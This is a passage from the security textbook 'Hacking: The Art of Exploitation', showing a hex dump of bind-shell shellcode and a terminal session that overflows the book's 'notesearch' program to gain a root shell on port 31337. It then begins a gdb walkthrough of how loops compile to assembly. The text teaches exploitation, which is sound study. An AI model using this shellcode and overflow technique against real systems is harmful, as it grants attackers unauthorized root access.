Hacking - The Art of Exploitation, 2nd Edition

Shellcode 309

00000030 80 b0 66 43 52 52 56 89 e1 cd 80 89 c3 6a 3f 58 |..fCRRV......j?X|

00000040 31 c9 cd 80 b0 3f 41 cd 80 b0 3f 41 cd 80 b0 0b |1....?A...?A....|

00000050 52 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 52 89 e2 |Rh//shh/bin..R..|

00000060 53 89 e1 cd 80 |S....|

00000065

reader@hacking:~/booksrc $ export SHELLCODE=$(cat bind_shell_beta)

reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch

SHELLCODE will be at 0xbffff97f

reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x7f\xf9\xff\xbf"x40')

[DEBUG] found a 33 byte note for user id 999

-------[ end of note data ]-------

From another terminal window, the program netstat is used to find the

listening port. Then, netcat is used to connect to the root shell on that port.

reader@hacking:~/booksrc $ sudo netstat -lp | grep 31337
tcp 0 0 :31337 :* LISTEN 25604/notesearch
reader@hacking:~/booksrc $ nc -vv 127.0.0.1 31337
localhost [127.0.0.1] 31337 (?) open
whoami
root

0x542 Branching Control Structures

The control structures of the C programming language, such as for loops

and if-then-else blocks, are made up of conditional branches and loops in the

machine language. With control structures, the repeated calls to dup2 could be

shrunk down to a single call in a loop. The first C program written in previous

chapters used a for loop to greet the world 10 times. Disassembling the main

function will show us how the compiler implemented the for loop using assem-

bly instructions. The loop instructions (shown below in bold) come after the

function prologue instructions save stack memory for the local variable i.

This variable is referenced in relation to the EBP register as [ebp-4].

reader@hacking:~/booksrc $ gcc firstprog.c
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) disass main
Dump of assembler code for function main:
0x08048374 <main+0>: push ebp
0x08048375 <main+1>: mov ebp,esp
0x08048377 <main+3>: sub esp,0x8
0x0804837a <main+6>: and esp,0xfffffff0
0x0804837d <main+9>: mov eax,0x0
0x08048382 <main+14>: sub esp,eax
0x08048384 <main+16>: mov DWORD PTR [ebp-4],0x0
0x0804838b <main+23>: cmp DWORD PTR [ebp-4],0x9
0x0804838f <main+27>: jle 0x8048393 <main+31>
0x08048391 <main+29>: jmp 0x80483a6 <main+50>
0x08048393 <main+31>: mov DWORD PTR [esp],0x8048484
0x0804839a <main+38>: call 0x80482a0 printf@plt